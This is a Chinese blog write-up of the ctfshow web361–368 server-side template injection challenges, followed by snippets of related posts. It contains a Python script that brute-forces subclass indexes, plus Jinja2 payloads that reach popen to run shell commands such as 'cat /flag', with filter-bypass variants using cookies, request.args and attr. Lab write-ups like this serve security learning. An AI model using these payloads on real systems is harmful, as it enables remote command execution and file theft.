ctfshow-SSTI

最新推荐文章于 2024-08-27 00:57:47 发布
最新推荐文章于 2024-08-27 00:57:47 发布
阅读量885 收藏 16
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80125214/article/details/136746123
版权
本文详细描述了一种利用SSTI(Server-SideTemplateInjection)漏洞在Web应用中执行代码和读取flag的方法,涉及利用内置类、对象基类、子类以及不同过滤条件下执行shell命令和操作文件的过程。
摘要由CSDN通过智能技术生成

web361

由题目提示可知url参数名应该是name,尝试输入name=world

发现world被输出 

 输入name={{7*7}},输出49,说明存在SSTI注入

获取内置类对应的类

 name={{''.__class__}}

获取object基类

name={{' '.__class__.base__}}

 

 获得所有子类

name={{''.__class__.__base__.__subclasses()__}}

获得可以执行shell命令的子类

python脚本
import requests

for num in range(500):
    try:
        url = "http://d1d66a66-a5b8-440b-890a-bba4fccf51f4.challenge.ctf.show/?name={{''.__class__.__base__.__subclasses__()["+str(num)+"].__init__.__globals__['popen']}}"
        res = requests.get(url=url).text
        if 'popen' in res:
            print(num)
    except:
        pass

 

执行命令name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}

 

 读取flag

?name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

 web362

构造payload:?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

web363

过滤了引号,使用request

传入{{ config.__class__.__init__.__globals__['os'] }},因为引号被过滤,所以无法执行,可以把'os'换成request.args.a

随后在后面传入a的值,变成{{ config.__class__.__init__.__globals__[request.args.a] }}&a=os,与原命令等效

构造payload:name={{config.__class__.__init__.__globals__[request.args.a].popen(request.args.b).read()}}&a=os&b=cat ../flag

web364

过滤了引号和args,使用cookie代替args

?name={{url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}
Cookie:a=os;b=popen;c=cat /flag

web365

过滤了中括号

?name={{url_for.__globals__.os.popen(request.cookies.a).read()}}
Cookie:a=cat /flag

web366

过滤了下划线

?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}

Cookie:a=__globals__;b=cat /flag


web367

过滤了os

?name{{(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}
Cookie:a=__globals__;b=os;c=cat /flag

web368

过滤了{{

?name={% print(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read() %}
Cookie:a=__globals__;b=os;c=cat /flag

2301_80125214
关注
[CTFSHOW][WEB入门]SSTI模版注入
fallingskies
10-14 528
web361 Flask是一个使用Python编写的轻量级web应用框架,其WSGI工具箱采用Werkzeug,模板引擎则使用Jinja2。 参考https://xz.aliyun.com/t/3679#toc-8https://xz.aliyun.com/t/3679#toc-8 使用poc进行测试 {{5*5}} 显然存在模版注入。 查找可以利用的类 {{"".__class__.__bases__[0].__subclasses__()}} 已知<class '...
CTFshow-SSTI
Leo8283的博客
04-25 344
在CTFWEB入门的路上一直感恩有这么多大佬博文帮忙 第一步了解了ssti是个什么东西,做题时就要看大佬的解题博客,比较清晰能串联知识点 CTFshow做题 ssti做题逻辑 测试:name={{1%2b1}} %2b是加号,不能用+,一定要编码,因为+在url中会被当做空格 存在ssti: 查看当前类:{{''.__class__}} 查看当前类的所属类:{{''.__class__.__bases__}} 或者类的解析顺序{{''.__class__.__mro__}} 找到object基类
CTFSHOW-SSTI
灰太的表格的博客
01-26 775
361 没发现什么过滤,直接用burp跑了下 最后payload:{{().__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}} 362 同361payload
ctfshow web入门 SSTI
最新发布
2401_86043716的博客
08-27 277
从全局变量字典中获取名为popen的变量7.使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。8.调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。payload。
ctfshow-ssti
weixin_74660472的博客
04-18 409
ssti漏洞原理ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类。
ctfshow-web364(SSTI)
m0_62094846的博客
04-30 577
用上题的方法,发现还是有东西被过滤了 筛选后发现是args 过滤了引号和args,上题的姿势不能用了,但是可以用chr()函数绕过。 可以用这个payload判断chr()函数的位置: {{().__class__.__bases__[0].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}} 用bp跑后发现有这几个,可以任意取 取80 分析一下别人的wp(现在的水平也只能这样了) ?name={%...
ctfshow-web365(SSTI)
m0_62094846的博客
05-05 338
这次是把args [ 和' 过滤了 有两种方式可以绕过[ 可以用__getitem__和pop代替,因为pop会破坏数组的结构,所以更推荐用__getitem__ ?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行...
ctfshow SSTI
07-29
CTFShow (Capture The Flag Show) 是一个网络安全竞赛平台,其中包含了很多有趣的挑战。...在CTFShow中,你可以通过寻找并利用SSTI漏洞来完成相应的挑战。请问你对SSTI有什么具体的问题或需要进一步了解的内容吗?
CTFshow SSTI
starttv的博客
11-21 738
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。SSTI 就是服务器端模板注入(Server-Side Template Injection)
ctfshow--SSTI
qq_51684648的博客
03-15 611
ctfshow–SSTI 361、 {{7*‘7’}}回显是7777777,判断是jinjia2模板。 {{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}} ''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。 362、 在__builtin__中有众多的可用函数,包括eval 1: ?name={{ur
CTFSHOW SSTI
羽的博客
01-08 6174
文章目录web361web362web363web364web365web366、367web368web369web370web371web372 建议大家先看下笔者之前写的模板注入的文章 web361 payload name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 payload ?name={{x.__init__.__glo
CTFSHOW SSTI入门
v2ish1yan的博客
09-02 637
ssti入门题
CTFshow——SSTI
D.MIND 的博客
03-06 2190
首先一定要了解有关python类的知识: python __base__等内置方法 python inspect模块解析 # coding=utf-8_ _author__ = "leaves" class Base(object): a = 0 def __init__(self): self._a = 10 pass class Child(Base): "测试测试" _b = 10 def __str__(
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值